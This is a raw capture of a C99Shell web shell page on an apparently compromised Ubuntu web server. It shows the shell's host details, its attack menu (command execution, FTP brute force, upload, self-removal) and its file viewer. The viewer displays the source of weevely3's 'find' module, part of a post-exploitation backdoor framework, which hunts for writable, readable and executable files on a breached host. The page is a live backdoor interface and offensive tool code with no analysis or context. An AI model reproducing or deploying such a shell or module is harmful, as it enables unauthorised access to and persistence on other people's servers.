!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/pmb/weevely3/src/weevely/modules/file/   drwxr-xr-x
Free 13.18 GB of 57.97 GB (22.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     find.py (2.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
import os

from weevely.core.loggers import log
from weevely.core.module import Module
from weevely.core.vectors import PhpFile
from weevely.core.vectors import ShellCmd


class Find(Module):
    """Find files with given names and attributes."""

    aliases = ["find"]

    def init(self):
        self.register_info({"author": ["Emilio Pinna"], "license": "GPLv3"})

        self.register_vectors(
            [
                PhpFile(
                    payload_path=os.path.join(self.folder, "bfs_walker.tpl"),
                    name="php_find",
                ),
                ShellCmd(
                    # -print -quit must be at the end of the command
                    payload="""find ${rpath} ${ '-maxdepth 1' if no_recursion else '' } ${ '-writable' if writable else '' } ${ '-readable' if readable else '' } ${ '-executable' if executable else '' } ${ '-type %s' % (ftype) if (ftype == 'd' or ftype == 'f') else '' } ${ "-%sregex '.*%s.*'" % ( '' if case else 'i', expression) if expression else '' } ${ '-print -quit' if quit else '' }""",
                    name="sh_find",
                    arguments=[
                        "-stderr_redirection",
                        " 2>/dev/null",
                    ],
                ),
            ]
        )

        self.register_arguments(
            [
                {"name": "rpath", "help": "Starting path"},
                {"name": "expression", "help": "Regular expression to match file name", "nargs": "?"},
                {"name": "-quit", "action": "store_true", "default": False, "help": "Quit at first result"},
                {"name": "-writable", "action": "store_true"},
                {"name": "-readable", "action": "store_true"},
                {"name": "-executable", "action": "store_true"},
                {"name": "-ftype", "help": "File type", "choices": ("f", "d")},
                {"name": "-no-recursion", "action": "store_true", "default": False},
                {"name": "-vector", "choices": self.vectors.get_names(), "default": "php_find"},
                {"name": "-case", "help": "Case sensitive", "action": "store_true", "default": False},
            ]
        )

    def run(self, **kwargs):
        result = self.vectors.get_result(self.args["vector"], self.args)

        return result.rstrip().split("\n") if isinstance(result, str) else result

    def print_result(self, result):
        if result:
            log.info("\n".join(result))

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0055 ]--